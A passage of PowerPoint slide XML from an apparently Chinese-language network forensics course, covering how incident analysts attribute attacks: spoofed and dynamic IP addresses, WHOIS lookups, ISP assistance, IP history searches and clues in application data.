        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="3692525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．许多的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>有些攻击试图用成百上千个不同的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击常常依赖大量的被侵害的机器来执行协同的攻击。有时这种表象是迷惑人的——攻击者也许不需要使用真正的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，所以产生许多不同的错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址去增加迷惑性；有时攻击者会用一个真实的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址加上许多假的地址，在这种情况下，通过寻找别的在此攻击之前或之后用到的任何一样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，是有可能辨认出真实的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的。找到一个匹配的并不能确定这就是攻击者的地址，攻击者可能无意或有意地假冒了一个合法的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的合法性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址常常是动态的分配的，以前被攻击过的系统所用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，现在可能是另一个系统在使用。另外，许多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址并不属于最终的用户系统，而是网络基础设施设备使用它们自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，代替真实的源地址，就象防火墙起到的网络地址转换（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）功能一样。有些攻击者会使用匿名，这些匿名是属于中间服务器的，它们代替用户执行活动，从而保户用户的隐私。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="2722880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以下是几种证实可疑主机身份的方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    1．联系IP地址的所有者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>区域性互联网登记处（Regional Internet Registry），例如ARIN、APNIC、RIPE NCC和LACNIC，它们提供确认组织或个人所有的特定IP地址的WHO IS查询机制。这个信息对分析一些攻击是有用的，如由同一个所有者注册的三个不同IP地址产生的可疑活动。但是，大多数情况下，分析人员不能直接联系地址所有者；通常情况下，他们必须向所属机构的管理部门和法律顾问提供地址所有者的信息，如果需要，由他们联系这些机构或给分析人员以帮助。这样做主要考虑到与外部机构共享信息，IP地址的所有者同样可能是攻击者。</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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="2076450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以下是几种证实可疑主机身份的方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    2．给IP地址发送网络通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不应该向一个明显正在进行攻击的IP地址发送网络通信以证实他的身份，任何响应不能最终证实正在进行攻击的主机身份。而且，如果这个IP地址被攻击者系统利用，攻击者就能看到发送的通信，并破坏证据或者攻击发送通信的主机。如果是假冒的IP地址，发送主动的网络通信给系统，会被解释为未经授权的使用或一种袭击，任何情况下个人不应该在未经允许时获取其他系统的访问权。</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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1143635"/>
            <a:ext cx="7303770" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以下是几种证实可疑主机身份的方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    3．寻求ISP的帮助。</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ISP通常需要法律手续才提供可疑网络事件的信息。因此，只有在最严重的网络攻击的调查中，才考虑ISP的帮助。这种帮助在有关假冒IP地址的攻击中是很有用的。不论IP地址是否假冒，ISP都有能力追踪正在进行的攻击，并且直到源头。</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6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以下是几种证实可疑主机身份的方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    4．调查IP地址的历史</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以查找用过相同IP地址或IP地址块的以前的可疑活动。网络通信数据档案和事件追踪数据库也许能够显示以前的活动。查找可能的外部数据源包括Internet搜寻引擎和允许通过IP地址搜索的在线事件数据库。</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en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.5.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者的确认</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1430020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>以下是几种证实可疑主机身份的方法：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="16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    5．在应用程序内容中找寻线索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600" b="1"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a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>与攻击有关的应用程序数据包可能包含了攻击者身份的线索。除了IP地址，有价值的信息可能包括e-mail地址或一个用于网络聊天（IRC）的昵称。</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899592" y="262884"/>
            <a:ext cx="3888432"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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6.5.5 对检查和分析的建议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1131590"/>
            <a:ext cx="7056784" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络通信中数据使用的几点重要的建议：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    1．应该有对涉及隐私和敏感信息的管理策略：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
